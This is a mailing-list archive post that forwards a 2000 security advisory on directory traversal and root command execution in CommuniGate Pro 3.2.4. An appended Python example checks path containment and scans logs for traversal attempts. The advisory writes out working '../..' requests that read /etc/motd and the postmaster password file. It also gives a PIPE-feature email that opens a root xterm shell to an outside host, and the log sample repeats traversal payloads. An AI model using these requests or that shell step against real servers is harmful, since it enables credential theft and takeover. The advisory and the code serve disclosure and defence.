Re: Vulnerabilities in CommuniGate Pro v3.2.4

From: Igor Vinokurov <igor_at_mx_ru>
Date: Tue 18 Jul 2000 - 13:03:39 MSD


On Tue, 18 Jul 2000 11:35:44 +0400
 Boris Tyshkiewitch <bvt@zenon.net> wrote:
>
> If anyone is running 3.2.4, delete/rename the Guide directory
> immediately.

WebGuide.

3.2 is affected too.

>
> Boris.
>
>
> ----------------
> This is a forwarded message
> From: Lluis Mora <llmora@S21SEC.COM>
> To: BUGTRAQ@SECURITYFOCUS.COM <BUGTRAQ@SECURITYFOCUS.COM>
> Date: Tuesday, July 18, 2000, 1:09:41 AM
> Subject: S21SEC-003: Vulnerabilities in CommuniGate Pro v3.2.4
>
> ===8<==============Original message text===============
>
> ###############################################################
> ID: S21SEC-003-en
> Title: Vulnerabilities in Stalker's CommuniGate Pro v3.2.4
> Date: 03/04/2000
> Status: Vendor contacted
> Scope: Remote command execution as superuser
> Platforms: Linux, probably others
> Author: llmora, fjserna
> Location: http://www.s21sec.com/en/avisos/s21sec-003-en.txt
> Release: Public
> ###############################################################
>
> S 2 1 S E C
>
> http://www.s21sec.com
>
> Vulnerabilities in Stalker's CommuniGate Pro v3.2.4
>
>
> About CommuniGate Pro
> ---------------------
>
> CommuniGate Pro is a feature-full commercial mail server
> (http://www.stalker.com/CommuniGatePro/).
>
> It does SMTP message routing, provides POP, IMAP and HTTP access to
> mail, etc.
>
> The CommuniGate Pro mail server has a built-in web server that allows
> users to read and send e-mail through the web, as well as allowing the
> administrator to remotely manage the mail server settings.
>
> By default it opens port 8100/tcp for web users access to mail and port
> 8010/tcp for web management access.
>
> Vulnerability description
> -------------------------
>
> 1. Reading any file in the mail server
>
> CommuniGate provides a useful mapping to access the Web User Guide, which
> maps the URL /Guide/ to a directory in the CommuniGate sub tree. The
> built-in web server suffers from the well-known "../.." web server
> problem. If we request a document from the administrative web server
> /Guide/ mapping, using the "../.." technique, we get to see the file
> contents:
>
> homer:~$ telnet ilf 8010
> Escape character is '^]'.
> GET /Guide/../../../../../../../../../../../../../../../etc/motd HTTP/1.0
>
> HTTP/1.0 200 OK
> [... the /etc/motd file content is shown]
>
> Connection closed by foreign host.
> homer:~$
>
> As CommuniGate runs as root and it doesn't drop any privileges, we are
> able to access any file in the system, e.g. /etc/shadow, ...
>
> E.g., we can retrieve the postmaster/manager settings file, which
> includes the plaintext password to access the management website:
>
> homer:~$ telnet ilf 8010
> Escape character is '^]'.
> GET /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings HTTP/1.0
>
> HTTP/1.0 200 OK
> Content-Length: 61
> Date: Mon, 03 Apr 2000 09:17:35 GMT
> Content-Type: application/octet-stream
> Server: CommuniGatePro/3.2.4
> Expires: Tue, 04 Apr 2000 09:17:35 GMT
>
> { ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
> Connection closed by foreign host.
> homer:~$
>
> 2. Remote execution of arbitrary commands as root
>
> This is not a vulnerability in itself but a demonstration of what can be
> accomplished once an attacker has obtained the postmaster password.
>
> Looking up the features of CommuniGate, we find the PIPE feature. It
> allows people to send e-mail to a program in the mail server. It's
> disabled by default, but once we can access the mail server settings
> using the postmaster password, we can just enable it, make the
> application directory be /usr/X11R6/bin/, increase the max. process
> execution time, and send an e-mail to
> "xterm -display 172.16.2.4:0 -e /bin/sh"@pipe which will open a root
> xterm in our desktop...
>
> Affected versions and platforms
> -------------------------------
>
> This bug has been tested on the Linux (non-redhat & redhat) v3.2.4 (the
> latest stable release) distribution found at www.stalker.com. It has not
> been tested with other platforms or previous versions, though we
> strongly believe the bug is platform independent, and can probably be
> found and reproduced in previous releases.
>
> Current beta versions (as from v3.3b2) don't suffer from this security
> problem.
>
> Fix information
> ---------------
>
> There is an upcoming stable release (v3.3) that will fix this problem,
> and currently the v3.3 betas (v3.3b2 or newer) are patched against this
> attack.
>
> Upgrades are available from the vendor website at
> http://www.stalker.com.
>
> Additional information
> ----------------------
>
> This vulnerability was found and researched by:
>
> Lluis Mora llmora@s21sec.com
> Fermin J. Serna fjserna@s21sec.com
>
> You can find the latest version of this advisory at:
>
> http://www.s21sec.com/en/avisos/s21sec-003-en.txt
>
> And other S21SEC advisories at http://www.s21sec.com/en/avisos/
>
>
> ===8<===========End of original message text===========
>

-- 
Igor Vinokurov

##################################################################
You received this message because you are subscribed to the mailing list
  <CGatePro@mx.ru>.

To unsubscribe, send a message to <CGatePro-off@mx.ru>
To switch to digest mode - mailto:<CGatePro-digest@mx.ru>
To switch to index mode - mailto:<CGatePro-index@mx.ru>
For administrative requests, use <CGatePro-request@mx.ru>
Received Tue Jul 18 09:03:56 2000

This archive was generated by hypermail 2.1.8 : Tue 21 Feb 2006 - 03:14:02 MSK
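The first finding in the forwarded advisory is the classic "../.." escape from a URL prefix (/Guide/) that is mapped onto a directory. The Python below is an added example for this thread, not CommuniGate Pro code and not anything from the advisory's authors: it shows how such a mapping can be kept inside its document root (decode the path once, strip leading slashes, normalise, then test containment against the root) and how an access log can be checked for requests that the mapping would reject. The document root GUIDE_ROOT, the common-log-format layout and the log lines are constructed for the example; CommuniGate's real directory and log format are not given on the page.

```python
"""Containment check for a URL-prefix-to-directory mapping, plus a log scan.

Added example for the /Guide/ traversal described in the advisory; this is
not CommuniGate Pro code.  GUIDE_ROOT and the log format are assumptions.
"""
import posixpath
import re
from typing import List, Optional
from urllib.parse import unquote

GUIDE_URL_PREFIX = "/Guide/"
# Hypothetical document root; the advisory does not name the real directory.
GUIDE_ROOT = "/var/CommuniGate/WebGuide"


def resolve_guide_path(request_target: str, root: str = GUIDE_ROOT) -> Optional[str]:
    """Map a request target under /Guide/ to a file path inside ``root``.

    Returns the normalised path, or None when the request does not belong to
    the mapping, contains bytes the lookup must not pass on, or would resolve
    outside ``root`` (the "../.." case).
    """
    # Query strings never take part in the filesystem lookup.
    path = request_target.split("?", 1)[0]
    # Decode percent-encoding exactly once, so "%2e%2e" is seen as "..".
    path = unquote(path)
    if not path.startswith(GUIDE_URL_PREFIX):
        return None
    # NUL terminates C strings early; backslash is a separator on some platforms.
    if "\x00" in path or "\\" in path:
        return None
    # Strip leading slashes so posixpath.join stays anchored at root.
    relative = path[len(GUIDE_URL_PREFIX):].lstrip("/")
    root_norm = posixpath.normpath(root)
    # normpath collapses "x/../", "./" and repeated slashes; the containment
    # test below is what actually decides whether the request is allowed.
    candidate = posixpath.normpath(posixpath.join(root_norm, relative))
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        return None
    return candidate


# Constructed access-log lines in common log format (not CommuniGate's format).
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Apr/2000:09:17:35 +0000] "GET /Guide/index.html HTTP/1.0" 200 1204',
    '10.0.0.9 - - [03/Apr/2000:09:18:02 +0000] "GET /Guide/../../../../etc/motd HTTP/1.0" 200 240',
    '10.0.0.9 - - [03/Apr/2000:09:18:40 +0000] "GET /Guide/%2e%2e/%2e%2e/etc/passwd HTTP/1.0" 200 900',
    '10.0.0.7 - - [03/Apr/2000:09:19:01 +0000] "GET /Guide/chapter..2.html HTTP/1.0" 200 3000',
]

REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+)')


def find_traversal_attempts(log_lines: List[str]) -> List[str]:
    """Return the /Guide/ request targets that the mapping would reject.

    Reuses resolve_guide_path so the log check and the server check agree on
    what counts as an escape; "chapter..2.html" is a legitimate name and is
    not flagged, unlike a naive substring match on "..".
    """
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group(1)
        if unquote(target).startswith(GUIDE_URL_PREFIX) and resolve_guide_path(target) is None:
            hits.append(target)
    return hits


if __name__ == "__main__":
    for t in ("/Guide/index.html", "/Guide/../../../../etc/motd"):
        print(t, "->", resolve_guide_path(t))
    print("flagged:", find_traversal_attempts(SAMPLE_LOG))
```

The containment test is done on the normalised string rather than by counting ".." segments, so encoded dots, redundant "./" segments and extra slashes are all handled by the same two lines; if the real server follows symlinks, the same check should additionally be applied to the realpath of the candidate before opening it.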